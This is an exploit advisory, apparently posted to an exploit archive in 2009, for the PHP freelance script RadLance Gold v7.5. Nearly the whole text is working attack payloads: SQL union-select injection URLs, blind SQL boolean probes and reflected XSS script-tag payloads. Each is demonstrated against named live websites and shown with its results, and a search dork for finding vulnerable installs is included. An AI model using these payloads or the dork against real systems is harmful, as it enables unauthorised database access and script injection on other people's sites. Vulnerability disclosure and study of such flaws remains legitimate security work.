Home / os / win10

radlancegold-sqlxss.txt

Posted on 18 July 2009

########################################################################### #-----------------------------I AM MUSLIM !!------------------------------# ########################################################################### ============================================================================== _ _ _ _ _ _ / | | | | / | | | | / _ | | | | / _ | |_| | / ___ | |___ | |___ / ___ | _ | IN THE NAME OF /_/ \_ |_____| |_____| /_/ \_ |_| |_| ============================================================================== [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!] ============================================================================== [»] RadLance Gold v7.5 Multiple Remote Vulnerabilities ============================================================================== [»] Script: [ RadLance Gold v7.5 ] [»] Language: [ PHP ] [»] Download: [ http://www.radscripts.com/freelancescripts/index.php ] [»] Founder: [ Moudi <m0udi@9.cn> ] [»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...] [»] Team: [ EvilWay ] [»] Dork: [ Powered by: RadLance v7.5 ] [»] Price: [ $199 ] [»] Site : [ https://security-shell.ws/forum.php ] ########################################################################### ===[ Exploit + LIVE : SQL INJECTION vulnerability ]=== [»] http://www.site.com/patch/index.php?a=view_forum&fid=[SQL] [»] http://www.radlance.com/07.5s1/_plain/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0 [»] http://www.excellance.net/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0 RESULT : 5.0.67-community ===[ Exploit + LIVE : BLIND SQL vulnerability ]=== [»] http://www.site.com/patch/index.php?a=view_forum&fid=[BLIND] [»] http://www.radlance.com/07.5s1/_plain/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=5&admin=0 TRUE http://www.radlance.com/07.5s1/_plain/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=4&admin=0 FALSE SO MYSQL: V5 ===[ Exploit XSS + LIVE : vulnerability ]=== [»] http://www.site.com/patch/index.php?a=ulist&pr=[XSS]& [»] http://www.radlance.com/07.5s1/_plain/index.php?a=ulist&pr=1</title><ScRiPt %0A%0D>alert(566615539956)%3B</ScRiPt>& [»] http://www.excellance.net/index.php?a=ulist&pr=1</title><ScRiPt %0A%0D>alert(566615539956)%3B</ScRiPt>& Author: Moudi ###########################################################################

 

TOP